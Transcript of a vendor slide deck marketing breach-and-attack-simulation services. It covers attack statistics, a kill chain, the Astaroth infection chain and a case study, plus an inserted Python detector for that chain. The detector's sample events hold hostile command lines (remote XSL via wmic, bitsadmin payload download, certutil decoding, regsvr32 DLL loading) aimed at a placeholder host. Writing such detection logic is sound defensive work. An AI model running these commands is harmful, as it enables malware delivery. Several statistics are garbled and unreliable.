breach & attack simulation services · global media and digital marketing firm in the us,...
TRANSCRIPT
C O N F I D E N T I A L
BREACH & ATTACK
SIMULATION SERVICES
CYBERSECURITY
Quick Facts
- 5,2000 number of IoT device attacks
- 48% of email attachments are malicious
- 1 in 13 web requests lead to malware
- 4.1B data breaches in 2019
- $11.5B ransomware damages, with an attack every 14 sec in 2019
- $6.3M average cost of a breach
- Only 5% of companies' folders are protected
- $5.9M cost of information loss
- 206 days: average time to identify a breach
- 50 days: the average cost in time of a malware attack
- 2,244: average number of hacker attacks in a day
- $2.6M average cost of a malware attack on an organization
- 314 days: average lifecycle of a breach
Leading Industries Impacted
- The financial services industry incurs the highest cost from cybercrime at an average of $18.3 million per organization
- Supply-chain attacks were up by 78% in 2019
- Estimated losses in 2019 for the healthcare industry: $25 billion
BREACH & ATTACK
Kill chain
1) RESEARCH: Attackers look for a weakness they can exploit: phishing email spam with malware, a phone call, dressing like the night janitor, etc.
2) STAGE ATTACK (social engineering, infrastructure weakness): Attackers may need to keep staging attacks until the desired information is obtained or the desired access to the network is achieved.
3) EXFILTRATE: Once the attacker maintains access to the system, exfiltration can proceed indefinitely. Accessed data is exfiltrated back to the attacker over an HTTP-based path, FTP, Gopher, etc., from database and file servers.

Example staged chain (Astaroth):
Email with link -> Zip -> Link -> BAT -> WMIC downloads XSL file (JavaScript) -> Bitsadmin download -> Certutil decodes payloads -> Regsvr32 -> DLL -> Reflective DLL loading -> DLL -> Process hollowing / process injection into Userinit
- The attack begins with a spear-phishing email. WMIC downloads an XSL file.
- WMIC once again downloads an XSL file. Multiple instances of Bitsadmin download encoded payloads.
- Certutil decodes the downloaded payloads.
- This DLL decrypts and injects another DLL into userinit.
- The DLL that is loaded into userinit is a proxy that reads, decrypts, and reflectively loads a final DLL, which is the info-stealer Astaroth.
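As an added defender-side example that is not part of the Marlabs deck, the detection logic below scans constructed process-creation events for the living-off-the-land stages the chain above names (WMIC fetching a remote XSL, Bitsadmin downloads, Certutil decoding, Regsvr32 loading a DLL) and flags a host once several distinct stages have appeared, so a single legitimate use of one tool does not alert. The event format, host names, stage names and match patterns are assumptions.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style): (host, image, command line).
# Host WS01 shows the staged chain from the slide; WS02 shows benign use of the same tools.
SAMPLE_EVENTS = [
    ("WS01", "wmic.exe", 'wmic os get /format:"http://example.invalid/stage1.xsl"'),
    ("WS01", "bitsadmin.exe", "bitsadmin /transfer job1 http://example.invalid/p1.txt C:\\Users\\Public\\p1.txt"),
    ("WS01", "certutil.exe", "certutil -decode C:\\Users\\Public\\p1.txt C:\\Users\\Public\\p1.dll"),
    ("WS01", "regsvr32.exe", "regsvr32 /s C:\\Users\\Public\\p1.dll"),
    ("WS02", "certutil.exe", "certutil -verify C:\\certs\\corp.cer"),
    ("WS02", "wmic.exe", "wmic os get caption"),
]

# One rule per chain stage (assumed patterns): the binary that ran and what its command line must contain.
STAGE_RULES = [
    ("wmic_remote_xsl", "wmic.exe", re.compile(r"/format:\S*https?://\S*\.xsl", re.I)),
    ("bitsadmin_download", "bitsadmin.exe", re.compile(r"/transfer\b", re.I)),
    ("certutil_decode", "certutil.exe", re.compile(r"\s-decode\b", re.I)),
    ("regsvr32_dll_load", "regsvr32.exe", re.compile(r"\.dll\b", re.I)),
]


def match_stage(image, cmdline):
    """Return the name of the chain stage an event matches, or None if it matches nothing."""
    for stage, binary, pattern in STAGE_RULES:
        if image.lower() == binary and pattern.search(cmdline):
            return stage
    return None


def detect_chain(events, min_stages=3):
    """Collect the distinct stages seen per host, in order of first appearance.

    Returns {host: (stages, flagged)}; a host is flagged when at least min_stages
    distinct stages occurred, so one benign certutil or wmic call on its own does not alert.
    """
    seen = {}
    for host, image, cmdline in events:
        stages = seen.setdefault(host, [])
        stage = match_stage(image, cmdline)
        if stage and stage not in stages:
            stages.append(stage)
    return {host: (stages, len(stages) >= min_stages) for host, stages in seen.items()}


if __name__ == "__main__":
    for host, (stages, flagged) in detect_chain(SAMPLE_EVENTS).items():
        print(f"{host}: {'ALERT' if flagged else 'ok'} stages={stages}")
```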
OUTPUT
Detailed reports of the status and performance of security controls and processes.
The taxonomy consists of a common lexicon that enables business stakeholders, cyber defenders, and vendors to communicate clearly on the exact nature of a threat and on the objective assessment of the cyber defense plan that can defeat it.
SIMULATIONS
Ransomware attacks, (spear) phishing and whaling attacks, or clicking on malicious banners and links on websites; the full attack and expanded kill chain used by cyber attackers against enterprise infrastructure, using software test points that allow testing across roaming laptops, user desktops, virtual machines, or cloud infrastructure.
APPROACH
- Methodically select and analyze attacks, compare them to the capabilities of an organization's security controls, identify the gaps, and mitigate with security controls aligned to the organization's budget.
- Defense-in-depth architecture includes detective controls designed to monitor and alert on anomalous activity.
- Assess the effectiveness of security procedures, infrastructure, vulnerabilities, and techniques by using breach and attack simulation platforms; expose vulnerability gaps together with their respective configurations.
BREACH & ATTACK
Response to the CISO's key questions
Marlabs' Cybersecurity Methodology & Frameworks: NIST, MITRE
- What is our risk of a successful breach by threat actors such as APT29?
- Are we protected, for example against APT29?
ENGAGEMENT MODEL
- Assessments
- Workshops
- Implementation & deployment
- Managed Services
CASE STUDY: BREACH AND ATTACK SIMULATION
Client: Global media and digital marketing firm in the US, Europe & APAC
Business Challenges: Validate security controls against APTs; incident response readiness
Solution Highlights: Report weaknesses in each phase of the kill chain; workshop-based delivery model; recommendations on detection improvement; coverage of TTPs w.r.t. the MITRE ATT&CK Matrix
Business Benefits: Proactive threat mitigation; improved visibility; augmented security controls; maximized existing cyber security investments
BRINGING TOGETHER TECHNOLOGY, CULTURE AND VALUE TO HELP ENTERPRISES GET READY FOR CHANGE
THANK YOU